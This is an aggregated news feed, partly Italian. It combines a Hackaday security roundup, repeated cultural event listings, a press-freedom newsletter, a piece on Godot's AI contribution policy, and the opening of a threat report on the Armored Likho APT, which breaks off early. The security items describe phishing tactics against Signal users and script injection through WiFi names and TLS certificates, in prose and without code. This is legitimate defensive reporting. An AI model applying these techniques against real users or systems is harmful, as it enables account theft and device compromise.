Finti messaggi dell’Interpol usati per distribuire ransomware: come starne alla larga


@Informatica (Italy e non Italy)
È stata identificata una campagna di phishing che usa e-mail fraudolente spacciate per comunicazioni ufficiali dell’Interpol, con linguaggio formale e riferimenti legali, per convincere le vittime ad aprire allegati malevoli che nascondono

This Week in Security: Windows 10 Gets Another Year, SmartTV Botnets, Hiding Payloads, and LastPass Customer Leak


The media in this post is not displayed to visitors. To view it, please log in.

Unsurprisingly to many of us, app stores for smart televisions are also trash. Perhaps even more full of trash than other app stores due to the smaller ecosystem and fewer reviewers.

Spur analyzed the LG smart TV app store, and found that almost half of the apps available contain proxy software, turning your TV into a node in their proxy network. Are these apps malware? Many of the analyzed apps provided a thin veneer of user consent: they offer you the tradeoff of seeing an ad every 15 seconds, or allowing their “occasional web indexing” to run permanently in the background. Watch the fishtank app for five minutes, join their proxy network for life.

Spur notes that the proxy SDK in use appears to block connections to private network ranges (internal IP ranges like 192.168.x.x and 10.x.x.x), but that the SDK restricting access to those ranges is the only protection against accessing whatever network the TV is connected to.

Amazon and Roku ban proxy apps on their devices. Samsung and LG do not.

Win 10 Security Updates Extended


Microsoft has added another year of security updates to Windows 10. Despite trying to kill the platform, so many users remain on Windows 10 that Microsoft likely has no choice.

The extended support program was previously due to end in October 2026 but has now been pushed to October 2027. The security updates will be available for free in the UI, but users in other regions must activate OneDrive and sync system settings, or pay 1000 Microsoft credits (about $30).

The death of Windows 10 is near, but for those unwilling or unable to let go, it shuffles along.

Signal Phishing Attempts


Bleeping Computer has an article about increased phishing attempts from hacker groups in Russia targeting Signal users.

The phishing messages target politicians, government officials, military, and other high-profile intelligence targets, and claim that Signal is introducing mandatory two-factor authentication, before prompting the target to enable remote Signal backups. A second follow-up phishing attempt then prompts the user to copy the backup authentication tokens from Signal and provide them to the attacker.

Signal remote backups are a relatively recent addition to the messenger, making a backup on the Signal servers of a users messages and images, encrypted with a key known only to the user. While convenient, and likely fundamentally secure given the track record of the Signal team, this phishing campaign highlights a major weakness: once private content is accessible somewhere else, an attacker simply needs to obtain the keys to access it, which is significantly simpler than obtaining the message content directly from the victims phone.

Payloads in WiFi and LoRa


Sasha Romijn presented an excellent talk at OrangeCon on embedding attack payloads in unusual places.

Sasha found poor input handling of content from DNS servers, TLS certificates, server headers, DHCP host names, LoRa Mesh node names, WiFi network names, and more. In many cases, it seems to be as simple as embedding JavaScript or CSS inside a string; many sites and utilities don’t sanitize against escaped HTML, and the standards allow it.

They then go on to demonstrate more serious impacts, such as compromising the management accounts of two Europe-based hosting providers by injecting content into TLS certificates, and gaining root on some OpenWRT devices via a WiFi SSID which loads a hostile JavaScript into the LUCI web management interface, which then uses the web management system to install a backdoor root shell.

Sasha continues the tour-de-exploits by demonstrating multiple cross-site scripting injections into the Ripe NCC database which then allow browser manipulation of users on the RIPE website. This has enormous implications, because Ripe NCC is the Internet allocation organization for Europe and the Middle East: the company who assigns and manages IP address blocks.

Be sure to check out the full presentation, and let this be a lesson to always treat all data as hostile, even from what would seem to be your own services!

Collecting Boot Console Info


One of the first steps in getting access to an embedded device is to look for a serial port, or serial port test points. Often this can give an idea what sort of code is running on the system, and in some cases, give direct access via the boot loader or a Linux login console.

Boot Intel is a web-based tool to automate scraping boot messages from embedded devices, looking for exposed logins and vulnerable services. Boot Intel can take pasted boot logs, or directly connect to the device via WebSerial.

While Boot Intel is a paid service, there is a free version for hackers to explore devices.

CitrixBleed, again


watchTowr Labs is back with another excellent write-up on CitrixBleed, continuing the trend of memory leaks in Citrix Netscaler devices.

This collection of vulnerabilities allow leaking internal memory from the Citrix servers, which can expose logs, customer data, encryption keys, or anything else found in server memory. Netscaler devices offer SSL offloading, application acceleration, VPN and remote access, and load balancing; all installations where leaking memory is likely very bad.

The watchTower write-up maintains their trend of providing entertaining reads about highly technical topics. Do yourself a favor and be sure to give it a look!

Bits and Bytes


LastPass marketing partner Klue was compromised this week, impacting the customer data of multiple companies. Customer data such as email, phone numbers, addresses, and support tickets were exposed, however the LastPass vaults themselves were not impacted. While LastPass has revoked access to the impacted partner, the stolen data could assist phishing attacks against customers.

The open source self-hosted video sharing platform PeerTube has released an emergency update which addresses multiple vulnerabilities. While the release notes quote “medium to high severity” vulnerabilities, there are no specific details. If you run a PeerTube server, upgrade now!

Both Apple AirDrop and Google Quick Share have new vulnerabilities reported this week, with fixes coming soon. Both protocols are designed to allow file sharing to nearby devices, and accordingly, the issues found on them can be triggered on nearby devices. Researchers were able to find six vulnerabilities in macOS, iOS, Windows, and Android implementations of the sharing protocols. All of the discovered vulnerabilities led to crashes, but not full exploit and code execution. Sustained denial of service attacks were possible however, with nearby attackers able to keep the services unreachable and unusable for the duration.


hackaday.com/2026/07/03/this-w…

Prenderà il via nel mese di ottobre “Edificare la città”, il nuovo percorso formativo promosso dal Servizio nazionale per la pastorale giovanile (Snpg) dedicato agli operatori pastorali interessati ad approfondire i temi della Lettera enciclica Magni…

[2026-07-24] Idlegod / Tomorr / Lestophant @ NextEmerson


The media in this post is not displayed to visitors. To view it, please log in.

Idlegod / Tomorr / Lestophant

NextEmerson - Via di Bellagio 15, zona Castello - Firenze
(venerdì, 24 luglio 21:00)
Idlegod / Tomorr / Lestophant
Venerdì 24 luglio 2026, Next Emerson presenta:

Idlegod - sludge dalla piana
https://idlegod.bandcamp.com/feed/rss

Tomorr - rural doom da Empoli
https://tomorr.bandcamp.com/album/tomorr

Lestophant - sludge da Rifredi
https://lestophant.bandcamp.com/album/rifredi-suffering

@Next Emerson Garden, via di Bellagio 15, Firenze

no cani, no machi, si tappi

info accessibilità:
https://csaexemerson.org/index.php/csaccessibile/


lapunta.org/event/idlegod-tomo…

[2026-07-10] MARK FISHER PARTY - dal 9 al 12 luglio, tra Latina e Roma, prende vita il Fisher Party @ Timba


The media in this post is not displayed to visitors. To view it, please log in.

MARK FISHER PARTY - dal 9 al 12 luglio, tra Latina e Roma, prende vita il Fisher Party

Timba - via del Fornetto 1-3 Roma
(venerdì, 10 luglio 17:30)
MARK FISHER PARTY - dal 9 al 12 luglio, tra Latina e Roma, prende vita il Fisher Party
Membro negli anni Novanta del leggendario collettivo CCRU, acuto interprete dello zeitgeist neoliberale e autore di testi fondamentali per riflettere sul “realismo capitalista” come sentimento proprio della nostra epoca: Mark Fisher non è un feticcio da citare, né un poster da appendere. Le sue domande sono ancora le nostre, continuano a risuonare e interrogarci: come possiamo desiderare un futuro quando il presente sembra averlo cancellato?

Inventare il Futuro, Partito Capibara e altre realtà amiche hanno unito le forze per dar vita a un festival che porti in luce non solo l'assoluta attualità, ma anche la stratificazione culturale del suo pensiero: interventi, momenti conviviali e spazi pensati non come vuota celebrazione accademica, ma come corpo vivo fatto di teoria quanto di rito, musica, aggregazione, politica e immaginazione collettiva.

Dal 9 al 12 luglio, tra Latina e Roma, prende vita il Fisher Party.

Il programma:

Giovedì 9 luglio – Sottoscala 9, Latina

Si parte con un talk sul Gratuitismo insieme a Xenodibi, cui segue un rito collettivo ispirato alla chaos magic, ricordando gli interessi della CCRU per l'esoterismo. Si conclude con la proiezione del film "We Are Making A Film About Mark Fisher". Un’apertura intensa, quasi sciamanica.

Venerdì 10 luglio – Timba (Circolo Arci), Roma

Ci incontriamo per la presentazione del testo di Fisher "Materialismo Gotico" a cura di Libridazione, cui segue un talk sul tema del desiderio e del corpo a cura di Leonardo Morosini e Lorenzo Mundo. Ci addentriamo nella matrice, nello sviluppo più filosofico del pensiero di Fisher.

Sabato 11 luglio – Acrobax, Roma

Un pomeriggio ricco di talk che esplorano il retroterra culturale di Fisher, con un incontro speciale in collaborazione con Nero Edizioni dedicato alla storia della CCRU.

Partiamo con un dialogo fra il collettivo Supergetto e l'autore Roberto Ciccarelli, un piccolo "glossario" concentrato sui temi della singolarità, della velocità e dello spettro, per approfondire il rapporto di Fisher col pensiero di Deleuze e Guattari.

Il secondo talk, curato da Simone Zanello, esplora l’influenza su Fisher del pensiero di György Lukács in relazione allo standpoint feminism, a partire dalle lezioni 4 e 5 di Desiderio post-capitalista.

L'ambiente sarà costantemente avvolto dalla musica grazie a Radio Pink, che trasmetterà senza sosta i suoni e le atmosfere che hanno attraversato il pensiero dell'autore e il suo lavoro di critica culturale.

In serata ci distendiamo con il concerto del gruppo "Frammenti" seguito da due DJ set, tra cui il set de La Roboterie.

Domenica 12 luglio – Torrione Estate, Roma

Un'ultima giornata più distesa ma profonda, dedicata all’elaborazione politica collettiva: un laboratorio di scrittura utopica diretto da Lidia Noviello, seguito dal concerto del vibrafonista Pasquale Mirra e da un set ibrido per vinili e voci, in cui i testi emersi dal laboratorio verranno restituiti al pubblico insieme alle voci di rivoluzionari* delle avanguardie artistiche novecentesche.

Mark Fisher Party è un luogo in cui la teoria diventa carne, il fantasma diventa ritmo e la critica diventa desiderio di futuro.


roma.convoca.la/event/mark-fis…

[2026-07-11] MARK FISHER PARTY - dal 9 al 12 luglio, tra Latina e Roma, prende vita il Fisher Party @ LOA Acrobax


The media in this post is not displayed to visitors. To view it, please log in.

MARK FISHER PARTY - dal 9 al 12 luglio, tra Latina e Roma, prende vita il Fisher Party

LOA Acrobax - Via della Vasca Navale 6, Rome, Metro B San Paolo
(sabato, 11 luglio 18:00)
MARK FISHER PARTY - dal 9 al 12 luglio, tra Latina e Roma, prende vita il Fisher Party
Membro negli anni Novanta del leggendario collettivo CCRU, acuto interprete dello zeitgeist neoliberale e autore di testi fondamentali per riflettere sul “realismo capitalista” come sentimento proprio della nostra epoca: Mark Fisher non è un feticcio da citare, né un poster da appendere. Le sue domande sono ancora le nostre, continuano a risuonare e interrogarci: come possiamo desiderare un futuro quando il presente sembra averlo cancellato?

Inventare il Futuro, Partito Capibara e altre realtà amiche hanno unito le forze per dar vita a un festival che porti in luce non solo l'assoluta attualità, ma anche la stratificazione culturale del suo pensiero: interventi, momenti conviviali e spazi pensati non come vuota celebrazione accademica, ma come corpo vivo fatto di teoria quanto di rito, musica, aggregazione, politica e immaginazione collettiva.

Dal 9 al 12 luglio, tra Latina e Roma, prende vita il Fisher Party.

Il programma:

Giovedì 9 luglio – Sottoscala 9, Latina

Si parte con un talk sul Gratuitismo insieme a Xenodibi, cui segue un rito collettivo ispirato alla chaos magic, ricordando gli interessi della CCRU per l'esoterismo. Si conclude con la proiezione del film "We Are Making A Film About Mark Fisher". Un’apertura intensa, quasi sciamanica.

Venerdì 10 luglio – Timba (Circolo Arci), Roma

Ci incontriamo per la presentazione del testo di Fisher "Materialismo Gotico" a cura di Libridazione, cui segue un talk sul tema del desiderio e del corpo a cura di Leonardo Morosini e Lorenzo Mundo. Ci addentriamo nella matrice, nello sviluppo più filosofico del pensiero di Fisher.

Sabato 11 luglio – Acrobax, Roma

Un pomeriggio ricco di talk che esplorano il retroterra culturale di Fisher, con un incontro speciale in collaborazione con Nero Edizioni dedicato alla storia della CCRU.

Partiamo con un dialogo fra il collettivo Supergetto e l'autore Roberto Ciccarelli, un piccolo "glossario" concentrato sui temi della singolarità, della velocità e dello spettro, per approfondire il rapporto di Fisher col pensiero di Deleuze e Guattari.

Il secondo talk, curato da Simone Zanello, esplora l’influenza su Fisher del pensiero di György Lukács in relazione allo standpoint feminism, a partire dalle lezioni 4 e 5 di Desiderio post-capitalista.

L'ambiente sarà costantemente avvolto dalla musica grazie a Radio Pink, che trasmetterà senza sosta i suoni e le atmosfere che hanno attraversato il pensiero dell'autore e il suo lavoro di critica culturale.

In serata ci distendiamo con il concerto del gruppo "Frammenti" seguito da due DJ set, tra cui il set de La Roboterie.

Domenica 12 luglio – Torrione Estate, Roma

Un'ultima giornata più distesa ma profonda, dedicata all’elaborazione politica collettiva: un laboratorio di scrittura utopica diretto da Lidia Noviello, seguito dal concerto del vibrafonista Pasquale Mirra e da un set ibrido per vinili e voci, in cui i testi emersi dal laboratorio verranno restituiti al pubblico insieme alle voci di rivoluzionari* delle avanguardie artistiche novecentesche.

Mark Fisher Party è un luogo in cui la teoria diventa carne, il fantasma diventa ritmo e la critica diventa desiderio di futuro.


roma.convoca.la/event/mark-fis…

[2026-07-12] MARK FISHER PARTY - dal 9 al 12 luglio, tra Latina e Roma, prende vita il Fisher Party @ Parco del Torrione


The media in this post is not displayed to visitors. To view it, please log in.

MARK FISHER PARTY - dal 9 al 12 luglio, tra Latina e Roma, prende vita il Fisher Party

Parco del Torrione - via Prenestina 73 roma
(domenica, 12 luglio 19:00)
MARK FISHER PARTY - dal 9 al 12 luglio, tra Latina e Roma, prende vita il Fisher Party
Membro negli anni Novanta del leggendario collettivo CCRU, acuto interprete dello zeitgeist neoliberale e autore di testi fondamentali per riflettere sul “realismo capitalista” come sentimento proprio della nostra epoca: Mark Fisher non è un feticcio da citare, né un poster da appendere. Le sue domande sono ancora le nostre, continuano a risuonare e interrogarci: come possiamo desiderare un futuro quando il presente sembra averlo cancellato?

Inventare il Futuro, Partito Capibara e altre realtà amiche hanno unito le forze per dar vita a un festival che porti in luce non solo l'assoluta attualità, ma anche la stratificazione culturale del suo pensiero: interventi, momenti conviviali e spazi pensati non come vuota celebrazione accademica, ma come corpo vivo fatto di teoria quanto di rito, musica, aggregazione, politica e immaginazione collettiva.

Dal 9 al 12 luglio, tra Latina e Roma, prende vita il Fisher Party.

Il programma:

Giovedì 9 luglio – Sottoscala 9, Latina

Si parte con un talk sul Gratuitismo insieme a Xenodibi, cui segue un rito collettivo ispirato alla chaos magic, ricordando gli interessi della CCRU per l'esoterismo. Si conclude con la proiezione del film "We Are Making A Film About Mark Fisher". Un’apertura intensa, quasi sciamanica.

Venerdì 10 luglio – Timba (Circolo Arci), Roma

Ci incontriamo per la presentazione del testo di Fisher "Materialismo Gotico" a cura di Libridazione, cui segue un talk sul tema del desiderio e del corpo a cura di Leonardo Morosini e Lorenzo Mundo. Ci addentriamo nella matrice, nello sviluppo più filosofico del pensiero di Fisher.

Sabato 11 luglio – Acrobax, Roma

Un pomeriggio ricco di talk che esplorano il retroterra culturale di Fisher, con un incontro speciale in collaborazione con Nero Edizioni dedicato alla storia della CCRU.

Partiamo con un dialogo fra il collettivo Supergetto e l'autore Roberto Ciccarelli, un piccolo "glossario" concentrato sui temi della singolarità, della velocità e dello spettro, per approfondire il rapporto di Fisher col pensiero di Deleuze e Guattari.

Il secondo talk, curato da Simone Zanello, esplora l’influenza su Fisher del pensiero di György Lukács in relazione allo standpoint feminism, a partire dalle lezioni 4 e 5 di Desiderio post-capitalista.

L'ambiente sarà costantemente avvolto dalla musica grazie a Radio Pink, che trasmetterà senza sosta i suoni e le atmosfere che hanno attraversato il pensiero dell'autore e il suo lavoro di critica culturale.

In serata ci distendiamo con il concerto del gruppo "Frammenti" seguito da due DJ set, tra cui il set de La Roboterie.

Domenica 12 luglio – Torrione Estate, Roma

Un'ultima giornata più distesa ma profonda, dedicata all’elaborazione politica collettiva: un laboratorio di scrittura utopica diretto da Lidia Noviello, seguito dal concerto del vibrafonista Pasquale Mirra e da un set ibrido per vinili e voci, in cui i testi emersi dal laboratorio verranno restituiti al pubblico insieme alle voci di rivoluzionari* delle avanguardie artistiche novecentesche.

Mark Fisher Party è un luogo in cui la teoria diventa carne, il fantasma diventa ritmo e la critica diventa desiderio di futuro.


roma.convoca.la/event/mark-fis…

A journalist’s fight for Epstein transparency


Dear Friend of Press Freedom:

Journalist Katie Phang recently won a major victory in her lawsuit seeking to force the government to follow the Epstein Files Transparency Act. Her message to other independent journalists who want to fight government secrecy? “Our case is proof that you can do this.” Read on for more on how you can help defend press freedom this week.

A journalist’s fight for Epstein transparency


When Congress passed the Epstein Files Transparency Act with broad bipartisan support, the Justice Department was given until Dec. 19, 2025, to release all unclassified files related to the Epstein investigation.

The department blew the deadline, but trial lawyer, independent journalist, and former MSNBC host Katie Phang sued to force compliance. Last week, she won a decision that directed the government to start producing documents it kept hidden, or explain why it cannot.

We hosted an online panel about the implications of the case with Phang; her lawyer, Brendan Ballou of the Public Integrity Project; and Freedom of the Press Foundation (FPF) Daniel Ellsberg Chair on Government Secrecy Lauren Harper, moderated by FPF Senior Advocacy Adviser Caitlin Vogus.


New Jersey prosecutors: Drop charges against journalists who covered Delaney Hall


Prosecutors are holding criminal charges over the heads of at least three journalists who were wrongfully arrested while covering immigration protests at Delaney Hall in New Jersey, despite clearly identifying themselves as press and despite public officials acknowledging that journalists would be exempt from Newark’s curfew.

Journalists need to be able to report the news without fear of arrest. The pending charges against press who were working in Newark chill their ongoing work and the media as a whole, which in turn does continued damage to public safety. You can use our action center to tell prosecutors it’s past time to drop these baseless cases.


Age verification law puts journalists at risk


The Kids Internet and Digital Safety Act passed the House this week. If it — or similar legislation — becomes law, it would fundamentally change the way everyone, not just kids, accesses the internet.

That’s because these laws strongly incentivize — and, for some services, outright require — age verification. That’s a big problem for people who need to be able to use the internet anonymously, like journalists and their sources.

Vogus, along with Aliya Bhatia of the Center for Democracy & Technology, explained in The Intercept how requiring online age verification would make it harder for anonymous sources to connect with journalists through online platforms. Read it, and then use our action center to tell Congress today not to pass online censorship bills in the guise of kids safety.


Brendan Carr isn’t fooling anyone


Federal Communications Commission Chair Brendan Carr has a new excuse to harass news outlets: Requiring talk shows to reapply for permission to interview whatever politicians they want. Carr — known for embracing President Donald Trump’s agenda — claims that ABC’s “The View” needs to explain why it qualifies for a “bonafide news” exception to equal time requirements. Other talk shows, like conservative talk radio, have not drawn similar ire.

As we wrote in a public comment to the agency, “No matter what pretexts the FCC cites, anyone with a smidgen of common sense knows exactly what is going on: an FCC led by a man who has publicly disclaimed independence from Trump is using its authority both frivolously and selectively to do Trump’s bidding.” We encourage you to file your own comment before July 6. Our action center makes it easy for you.


Government wants your location data? Get a warrant, Supreme Court says


The Supreme Court just delivered its most important Fourth Amendment decision in years — and it’s a win for your privacy. In Chatrie v. United States, the court ruled that the Fourth Amendment requires the government to get a warrant for “geofence” demands that track location data.

We’ve written before about how geofences — which allow police to draw a virtual boundary around a crime scene and compel tech companies to turn over location data for devices in the area — could be used as a tool of mass surveillance or to monitor journalists and their sources.

The court’s decision puts an important check on this power. FPF Executive Director Trevor Timm broke down the ruling, explaining, “There’s no doubt that we all have more privacy rights with our cellphones today than we did yesterday.”


What we're reading


Supreme Court halts order to force reporter to reveal source or pay fine

The Washington Post
“The Supreme Court should use this opportunity to make clear that plaintiffs and prosecutors cannot commandeer the Fourth Estate to help them build their cases,” said FPF Chief of Advocacy Seth Stern about journalist Catherine Herridge’s case.


Court halts Pentagon rule requiring escorts for journalists

The New York Times
The New York Times beat the Pentagon in court again after it tried to shut out the press. If the Defense Department keeps trying to shut out the press contrary to the court’s rulings, the judge should respond with sanctions or contempt.


Ousted Stars and Stripes ombudsman files key lawsuit against Hegseth’s Pentagon

MS NOW
The fired Stars and Stripes ombudsman is getting in on the action of suing the Pentagon for its disregard for the First Amendment. Good. More journalists should take this administration to court.


‘Not the time and place for a political speech’

Columbia Journalism Review
Possessing zines and being in a book club were used as evidence that the Prairieland defendants were part of a terrorist cell — and a court agreed. This is a shocking erosion of the First Amendment.


Trump DOJ withdraws subpoenas as case collapses!

Legal AF
The government recently failed to force Washington Post and Wall Street Journal reporters to expose their sources before a grand jury, but the threat still looms. The next Congress must pass the PRESS Act to protect sources and the public’s right to know, Stern explained.



Are you subscribed to our other newsletters? Sign up for news on excessive government secrecy, and for digital security tips and advice at the link below.
Subscribe here


freedom.press/issues/a-journal…

Elezioni e Politica 2026 reshared this.

[2026-07-09] MARK FISHER PARTY - dal 9 al 12 luglio, tra Latina e Roma, prende vita il Fisher Party @ Sottoscala9 - circolo ARCI


The media in this post is not displayed to visitors. To view it, please log in.

MARK FISHER PARTY - dal 9 al 12 luglio, tra Latina e Roma, prende vita il Fisher Party

Sottoscala9 - circolo ARCI - via Isonzo 194 Latina
(giovedì, 9 luglio 18:00)
MARK FISHER PARTY
Membro negli anni Novanta del leggendario collettivo CCRU, acuto interprete dello zeitgeist neoliberale e autore di testi fondamentali per riflettere sul “realismo capitalista” come sentimento proprio della nostra epoca: Mark Fisher non è un feticcio da citare, né un poster da appendere. Le sue domande sono ancora le nostre, continuano a risuonare e interrogarci: come possiamo desiderare un futuro quando il presente sembra averlo cancellato?

Inventare il Futuro, Partito Capibara e altre realtà amiche hanno unito le forze per dar vita a un festival che porti in luce non solo l'assoluta attualità, ma anche la stratificazione culturale del suo pensiero: interventi, momenti conviviali e spazi pensati non come vuota celebrazione accademica, ma come corpo vivo fatto di teoria quanto di rito, musica, aggregazione, politica e immaginazione collettiva.

Dal 9 al 12 luglio, tra Latina e Roma, prende vita il Fisher Party.

Il programma:

Giovedì 9 luglio – Sottoscala 9, Latina

Si parte con un talk sul Gratuitismo insieme a Xenodibi, cui segue un rito collettivo ispirato alla chaos magic, ricordando gli interessi della CCRU per l'esoterismo. Si conclude con la proiezione del film "We Are Making A Film About Mark Fisher". Un’apertura intensa, quasi sciamanica.

Venerdì 10 luglio – Timba (Circolo Arci), Roma

Ci incontriamo per la presentazione del testo di Fisher "Materialismo Gotico" a cura di Libridazione, cui segue un talk sul tema del desiderio e del corpo a cura di Leonardo Morosini e Lorenzo Mundo. Ci addentriamo nella matrice, nello sviluppo più filosofico del pensiero di Fisher.

Sabato 11 luglio – Acrobax, Roma

Un pomeriggio ricco di talk che esplorano il retroterra culturale di Fisher, con un incontro speciale in collaborazione con Nero Edizioni dedicato alla storia della CCRU.

Partiamo con un dialogo fra il collettivo Supergetto e l'autore Roberto Ciccarelli, un piccolo "glossario" concentrato sui temi della singolarità, della velocità e dello spettro, per approfondire il rapporto di Fisher col pensiero di Deleuze e Guattari.

Il secondo talk, curato da Simone Zanello, esplora l’influenza su Fisher del pensiero di György Lukács in relazione allo standpoint feminism, a partire dalle lezioni 4 e 5 di Desiderio post-capitalista.

L'ambiente sarà costantemente avvolto dalla musica grazie a Radio Pink, che trasmetterà senza sosta i suoni e le atmosfere che hanno attraversato il pensiero dell'autore e il suo lavoro di critica culturale.

In serata ci distendiamo con il concerto del gruppo "Frammenti" seguito da due DJ set, tra cui il set de La Roboterie.

Domenica 12 luglio – Torrione Estate, Roma

Un'ultima giornata più distesa ma profonda, dedicata all’elaborazione politica collettiva: un laboratorio di scrittura utopica diretto da Lidia Noviello, seguito dal concerto del vibrafonista Pasquale Mirra e da un set ibrido per vinili e voci, in cui i testi emersi dal laboratorio verranno restituiti al pubblico insieme alle voci di rivoluzionari* delle avanguardie artistiche novecentesche.

Mark Fisher Party è un luogo in cui la teoria diventa carne, il fantasma diventa ritmo e la critica diventa desiderio di futuro.


roma.convoca.la/event/mark-fis…

Clemente Mastella: “Ho un tumore ma lotto per guarire. Ho paura di morire da solo”


@Politica interna, europea e internazionale
Clemente Mastella ha un tumore: lo ha rivelato lo stesso sindaco di Benevento dopo aver annunciato, durante la feste della Madonna delle Grazie, patrona del Sannio, di essere malato. Intervistato dal Corriere della Sera, l’ex ministro ha affermato: “Ho un tumore. Ho capito di avercelo da

(da Lampedusa) Un faro di circa 70 centimetri, realizzato con il legno dei barconi dei migranti. Sarà il regalo dell’isola di Lampedusa al Papa. A consegnarlo domani al Pontefice prima dell’inizio della messa, prevista alle 10.

Godot’s New Contributing Policy Adds Barriers for AI Slop


The media in this post is not displayed to visitors. To view it, please log in.

Like so many large and popular open source projects these days, the Godot game engine struggles with an influx of pull requests. The situation has become increasingly dire due to the advent of AI-generated code. More specifically, the issue involves the inverse relationship between PR code quality and the number of PRs, which wastes a lot of time on the side of a limited number of (volunteer) reviewers. This has now forced the project to update its contribution policy.

An interesting point raised in the announcement article is that of the demoralizing effect of AI-generated PRs on reviewers. Often the human behind such a PR isn’t interested in being educated, or may even be an automated agent which isn’t capable of productive discussion on pros and cons of certain coding approaches — never mind in becoming a more permanent maintainer for the project.

This problem has led to new rules being instated, which include a ban on autonomous AI agents and vibe coding, a ban on substantial AI generating of code, and a ban on AI-generated text in human-to-human communication. It also codifies the requirement that all PRs are to be reviewed and approved by a human being before merging.

In many ways this new policy is similar to that of the Mesa project, which demands code comprehension on the side of the submitter, although it doesn’t go as far as NetBSD, which just outright treats LLM-generated code as ‘tainted’ due to potential licensing and other concerns. Other projects like the Linux kernel opt to make the human submitter responsible for any AI tool usage by forcing them to declare it.

Meanwhile there are also indications that such ‘AI tool’ usage is reducing useful interactions with open source projects. What the future will bring here remains to be seen, but at least as far as open source projects go these tools are clearly increasingly being banished.


hackaday.com/2026/07/03/godots…

C’è una cifra che è passata quasi inosservata e che, invece, ha improntato la recente visita apostolica di Leone XIV a Pavia: la difesa del valore della vita, tema che ricorre spesso nelle sue esternazioni, come quella davanti al Parlamento spagnolo …

Un Sukhoi in chiave anti-droni? Cosa suggeriscono le ultime immagini diffuse in rete

@Notizie dall'Italia e dal mondo

Uno dei più noti esemplari di velivolo da caccia dell’aviazione russa potrebbe essere stato “riadattato” per svolgere funzioni di difesa contro la minaccia rappresentata dalle armi stand-off di Kyiv. Alcune immagini apparse sui social mostrano infatti un Sukhoi Su-57 “Felon” con una configurazione

(da Lampedusa) Seguire la visita di Papa Francesco a Lampedusa raggiungendo l’isola via mare. Da stasera si può, grazie ad un collegamento marittimo speciale da Porto Empedocle alla più grande delle Pelagie per consentire, a quanti vorranno, di parte…

This week, we discuss the Supreme Court, the private jet, and AI on the TV.#BehindTheBlog


Behind the Blog: With Blogs Like These, Who Needs a Private Jet


This is Behind the Blog, where we share our behind-the-scenes thoughts about how a few of our top stories of the week came together. This week, we discuss the Supreme Court, the private jet, and AI on the TV.

JOSEPH: I used to cover court cases and judge’s opinions a lot more back at Motherboard. Sometimes it was in cases I broke news in, like that time the FBI secretly ran a dark web child abuse website. Other times it is big decisions that have wider impacts on privacy, surveillance, and government power.

Here’s big news regarding the latter sort of decision. I first saw news of it on the Electronic Frontier Foundation’s blog. As it says at the start: “You have an expectation of privacy in location data that reveals your movements in the physical world, and even short-term surveillance of these movements is a search subject to the Fourth Amendment, the U.S. Supreme Court ruled today in Chatrie v. United States.”

This post is for subscribers only


Become a member to get access to all content
Subscribe now


The media in this post is not displayed to visitors. To view it, please log in.

Marilisa D’Amico e Mario Riccio a Milano per “Fine vita. La libertà di scegliere”

📍 Sala Pirelli, Palazzo Pirelli, Via Fabio Filzi 22, Milano
📅 Lunedì 6 luglio
🕓 Ore 16:00


Marilisa D’Amico, costituzionalista e consigliera generale dell’Associazione Luca Coscioni, e Mario Riccio, medico anestesista-rianimatore e consigliere generale dell’Associazione Luca Coscioni, interverranno all’incontro “Fine vita. La libertà di scegliere”. L’iniziativa sarà un’occasione di confronto sul quadro giuridico e sanitario del fine vita, sulle libertà già riconosciute e sulle riforme necessarie.

Interverranno inoltre Alfredo Bazoli – senatore della Repubblica, Francesca Floriani – esponente del Partito Democratico Lombardia. Introducono Pierfrancesco Majorino, capogruppo del Partito Democratico in Consiglio regionale della Lombardia e Silvia Roggiani, deputata e segretaria regionale del Partito Democratico Lombardia. Partecipa Franco Mirabelli, senatore della Repubblica. Coordina Carlo Borghetti, consigliere regionale della Lombardia.

L'articolo Marilisa D’Amico e Mario Riccio a Milano per “Fine vita. La libertà di scegliere” proviene da Associazione Luca Coscioni.

Zelensky sicuramente non sarà perfetto. ma quali capi di stato in europa a parità di situazione sarebbero stati alla sua altezza? la meloni? chi? senza contare che l'appoggio europeo e usa nel tempo è stato discontinuo e limitato. c'è chi sostiene che la russia si stia confrontando con l'arsenale nato. sbaglia. la russia si sta confrontando con un obsoleto arsenale sovietico, gli scarti dell'arsenale europeo nato, e molta fantasia e innovazione da parte ucraina. la capacità europea per il prossimo futuro di opporsi credibilmente a putin (e la credibilità è la chiave di lettura per sperare di evitare ulteriori guerre) non dipende più dagli usa ma dall'ucraina stessa e quello che ha imparato a fare durante questo terribile e tragico conflitto, confrontabile a questo punto solo con la prima o seconda guerra mondiale. putin ha di fatto invaso l'europa. e per nostra fortuna non sta andando bene. non si è accontentato della bielorussia. e la russia ha avuto come alleati Cina, corea del nord, iran e chissà chi altro.

Armored Likho digging a snake pit: inside the covert BusySnake Stealer campaign


The media in this post is not displayed to visitors. To view it, please log in.


Introduction


During our routine threat monitoring, we uncovered a new phishing campaign tied to a previously unknown APT group that we dubbed Armored Likho (also known as Eagle Werewolf based on circumstantial evidence). This targeted campaign focuses heavily on government agencies and the electric power sector. The geographical footprint of these attacks spans Russia, Brazil, and Kazakhstan, establishing the group as a global threat actor.

Armored Likho blends financially motivated campaigns targeting private individuals with targeted cyber-espionage aimed at organizations. Their toolkit features obfuscated, modular RATs and infostealers specifically engineered to bypass dynamic analysis. Alongside these, they leverage simpler tools like Go2Tunnel for remote access and network tunneling. This diverse malware stack enables the threat actor to maintain stealthy control of compromised hosts, exfiltrate credentials and other sensitive information, and dynamically deploy downloadable modules tailored to the victim’s profile and the tasks at hand.

Key campaign highlights:

  • The group is leveraging a previously undocumented tool dubbed BusySnake Stealer. This Python-based infostealer is designed to target Windows systems. We discovered multiple versions of the malware, along with an additional module dedicated to stealing cookies.
  • The first-stage malicious payload, consisting of loaders and stagers, was generated using AI, which blurs the attackers’ TTPs and complicates attribution efforts.

This campaign highlights several concurrent trends: the growing technical maturity of Armored Likho, tool polymorphism, and a shift toward more complex schemes aimed at bypassing security solutions — ranging from Python source code obfuscation to embedding network mechanisms directly into the malware code. In this post, we’ll dissect the campaign that remains active at the time of publication, as well as the toolkit utilized by the attackers.

Initial infection vector


Phishing remains one of the primary initial access vectors that this threat actor heavily relies on in its latest campaigns. Armored Likho uses spear-phishing emails, with themes ranging from official government notices to social programs. In their most recent campaign, the attackers distributed malicious attachments inside archive files with names such as 1bfb2e79-8084-429e-a35c-8b595ab9f839_psihologicheskiy_test.zip (psychological test) or zayavka_gumanitarnayapomosch.rar (humanitarian aid application). These archives contained executables or LNK files named to mimic the email themes, tricking users into executing them on their devices. Below, we break down several variants of how they achieve initial access.

EXE attachment


